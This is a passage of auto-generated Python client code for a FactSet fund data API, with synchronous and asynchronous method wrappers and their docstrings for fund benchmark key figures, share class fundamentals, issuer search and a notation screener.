_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2002, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_5_get(
self,
id,
id_notation_benchmark,
**kwargs
) -> InlineResponse2002:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of five years. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of five years. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2002
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_5_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_5_get_with_http_info(
self,
id,
id_notation_benchmark,
**kwargs
) -> typing.Tuple[InlineResponse2002, int, typing.MutableMapping]:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of five years. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of five years. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2002
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_5_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_5_get_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[InlineResponse2002]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of five years. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of five years. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2002]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_5_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_5_get_with_http_info_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2002, int, typing.MutableMapping]]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of five years. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of five years. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2002, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_5_get_endpoint.call_with_http_info(**kwargs)
def get_fund_share_class_get(
self,
id,
**kwargs
) -> InlineResponse2006:
"""Fundamental data for a share class of a fund. # noqa: E501
The provided fundamental data comprises share class-specific data and data applying to the fund and thus to all its share classes. An instrument other than a fund share class yields empty values for share class-specific or fund-specific attributes. Dates are interpreted in the timezone of the fund company. For attributes referring to a country, see endpoint `/basic/region/country/list` for possible values. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
id (str): Identifier of the instrument.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2006
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['id'] = \
id
return self.get_fund_share_class_get_endpoint.call_with_http_info(**kwargs)
def get_fund_share_class_get_with_http_info(
self,
id,
**kwargs
) -> typing.Tuple[InlineResponse2006, int, typing.MutableMapping]:
"""Fundamental data for a share class of a fund. # noqa: E501
The provided fundamental data comprises share class-specific data and data applying to the fund and thus to all its share classes. An instrument other than a fund share class yields empty values for share class-specific or fund-specific attributes. Dates are interpreted in the timezone of the fund company. For attributes referring to a country, see endpoint `/basic/region/country/list` for possible values. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
id (str): Identifier of the instrument.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2006
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['id'] = \
id
return self.get_fund_share_class_get_endpoint.call_with_http_info(**kwargs)
def get_fund_share_class_get_async(
self,
id,
**kwargs
) -> "ApplyResult[InlineResponse2006]":
"""Fundamental data for a share class of a fund. # noqa: E501
The provided fundamental data comprises share class-specific data and data applying to the fund and thus to all its share classes. An instrument other than a fund share class yields empty values for share class-specific or fund-specific attributes. Dates are interpreted in the timezone of the fund company. For attributes referring to a country, see endpoint `/basic/region/country/list` for possible values. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
id (str): Identifier of the instrument.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2006]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['id'] = \
id
return self.get_fund_share_class_get_endpoint.call_with_http_info(**kwargs)
def get_fund_share_class_get_with_http_info_async(
self,
id,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2006, int, typing.MutableMapping]]":
"""Fundamental data for a share class of a fund. # noqa: E501
The provided fundamental data comprises share class-specific data and data applying to the fund and thus to all its share classes. An instrument other than a fund share class yields empty values for share class-specific or fund-specific attributes. Dates are interpreted in the timezone of the fund company. For attributes referring to a country, see endpoint `/basic/region/country/list` for possible values. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
id (str): Identifier of the instrument.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2006, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['id'] = \
id
return self.get_fund_share_class_get_endpoint.call_with_http_info(**kwargs)
def post_fund_issuer_search(
self,
**kwargs
) -> InlineResponse2001:
"""Search for issuers of funds. # noqa: E501
Search for issuers of funds. FactSet does not consolidate the data provided by different suppliers, therefore the result may contain more than one identifier for a given issuer. The response is limited to 100 results. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Keyword Args:
body (InlineObject): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2001
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
return self.post_fund_issuer_search_endpoint.call_with_http_info(**kwargs)
def post_fund_issuer_search_with_http_info(
self,
**kwargs
) -> typing.Tuple[InlineResponse2001, int, typing.MutableMapping]:
"""Search for issuers of funds. # noqa: E501
Search for issuers of funds. FactSet does not consolidate the data provided by different suppliers, therefore the result may contain more than one identifier for a given issuer. The response is limited to 100 results. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Keyword Args:
body (InlineObject): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2001
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
return self.post_fund_issuer_search_endpoint.call_with_http_info(**kwargs)
def post_fund_issuer_search_async(
self,
**kwargs
) -> "ApplyResult[InlineResponse2001]":
"""Search for issuers of funds. # noqa: E501
Search for issuers of funds. FactSet does not consolidate the data provided by different suppliers, therefore the result may contain more than one identifier for a given issuer. The response is limited to 100 results. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Keyword Args:
body (InlineObject): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2001]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.post_fund_issuer_search_endpoint.call_with_http_info(**kwargs)
def post_fund_issuer_search_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2001, int, typing.MutableMapping]]":
"""Search for issuers of funds. # noqa: E501
Search for issuers of funds. FactSet does not consolidate the data provided by different suppliers, therefore the result may contain more than one identifier for a given issuer. The response is limited to 100 results. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
body (InlineObject): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2001, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.post_fund_issuer_search_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_search(
self,
**kwargs
) -> InlineResponse2004:
"""Screener for notations of share classes of mutual and exchange traded funds based on fund-specific parameters. # noqa: E501
Screener for notations of share classes of mutual and exchange traded funds (ETF) based on fund-specific parameters. The funds represent legal entities, juristic persons in particular, and may have more than one share class. The share classes represent instruments, and the notations represent price sources for the share classes. Some parameters apply to the fund as a whole, i.e. a notation for each share class of a fund matching the criteria is returned, for example `issuer.selection`. Others apply to the share classes, thus only notations of matching share classes are returned, for example `minimumInvestment.initial`. The result is limited to the notations that satisfy all the selected filters. In order to guarantee comparability when using the performance parameters, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`) and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. A specific set of share classes or share class notations can be restricted to or excluded by using customer-specific instrument or notation selection lists respectively. Such selection lists are set up by FactSet upon request. All identifiers used as parameters must be valid and entitled. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Keyword Args:
body (InlineObject1): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2004
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
return self.post_fund_notation_screener_search_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_search_with_http_info(
self,
**kwargs
) -> typing.Tuple[InlineResponse2004, int, typing.MutableMapping]:
"""Screener for notations of share classes of mutual and exchange traded funds based on fund-specific parameters. # noqa: E501
Screener for notations of share classes of mutual and exchange traded funds (ETF) based on fund-specific parameters. The funds represent legal entities, juristic persons in particular, and may have more than one share class. The share classes represent instruments, and the notations represent price sources for the share classes. Some parameters apply to the fund as a whole, i.e. a notation for each share class of a fund matching the criteria is returned, for example `issuer.selection`. Others apply to the share classes, thus only notations of matching share classes are returned, for example `minimumInvestment.initial`. The result is limited to the notations that satisfy all the selected filters. In order to guarantee comparability when using the performance parameters, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`) and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. A specific set of share classes or share class notations can be restricted to or excluded by using customer-specific instrument or notation selection lists respectively. Such selection lists are set up by FactSet upon request. All identifiers used as parameters must be valid and entitled. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Keyword Args:
body (InlineObject1): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2004
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
return self.post_fund_notation_screener_search_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_search_async(
self,
**kwargs
) -> "ApplyResult[InlineResponse2004]":
"""Screener for notations of share classes of mutual and exchange traded funds based on fund-specific parameters. # noqa: E501
Screener for notations of share classes of mutual and exchange traded funds (ETF) based on fund-specific parameters. The funds represent legal entities, juristic persons in particular, and may have more than one share class. The share classes represent instruments, and the notations represent price sources for the share classes. Some parameters apply to the fund as a whole, i.e. a notation for each share class of a fund matching the criteria is returned, for example `issuer.selection`. Others apply to the share classes, thus only notations of matching share classes are returned, for example `minimumInvestment.initial`. The result is limited to the notations that satisfy all the selected filters. In order to guarantee comparability when using the performance parameters, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`) and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. A specific set of share classes or share class notations can be restricted to or excluded by using customer-specific instrument or notation selection lists respectively. Such selection lists are set up by FactSet upon request. All identifiers used as parameters must be valid and entitled. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Keyword Args:
body (InlineObject1): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2004]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.post_fund_notation_screener_search_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_search_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2004, int, typing.MutableMapping]]":
"""Screener for notations of share classes of mutual and exchange traded funds based on fund-specific parameters. # noqa: E501
Screener for notations of share classes of mutual and exchange traded funds (ETF) based on fund-specific parameters. The funds represent legal entities, juristic persons in particular, and may have more than one share class. The share classes represent instruments, and the notations represent price sources for the share classes. Some parameters apply to the fund as a whole, i.e. a notation for each share class of a fund matching the criteria is returned, for example `issuer.selection`. Others apply to the share classes, thus only notations of matching share classes are returned, for example `minimumInvestment.initial`. The result is limited to the notations that satisfy all the selected filters. In order to guarantee comparability when using the performance parameters, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`) and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. A specific set of share classes or share class notations can be restricted to or excluded by using customer-specific instrument or notation selection lists respectively. Such selection lists are set up by FactSet upon request. All identifiers used as parameters must be valid and entitled. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
body (InlineObject1): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2004, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.post_fund_notation_screener_search_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_value_ranges_get(
self,
**kwargs
) -> InlineResponse2005:
"""Possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. # noqa: E501
The endpoint returns the possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. It allows to request the values and value ranges only for a restricted set of notations that match predefined parameters. The functionality may be used to pre-fill the values and value ranges of the parameters of the `/fund/notation/screener/search` endpoint so that performing a search always leads to a non-empty set of notations. In order to guarantee comparability when using the performance parameter, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`), and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Keyword Args:
body (InlineObject2): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2005
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
return self.post_fund_notation_screener_value_ranges_get_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_value_ranges_get_with_http_info(
self,
**kwargs
) -> typing.Tuple[InlineResponse2005, int, typing.MutableMapping]:
"""Possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. # noqa: E501
The endpoint returns the possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. It allows to request the values and value ranges only for a restricted set of notations that match predefined parameters. The functionality may be used to pre-fill the values and value ranges of the parameters of the `/fund/notation/screener/search` endpoint so that performing a search always leads to a non-empty set of notations. In order to guarantee comparability when using the performance parameter, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`), and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Keyword Args:
body (InlineObject2): [optional]
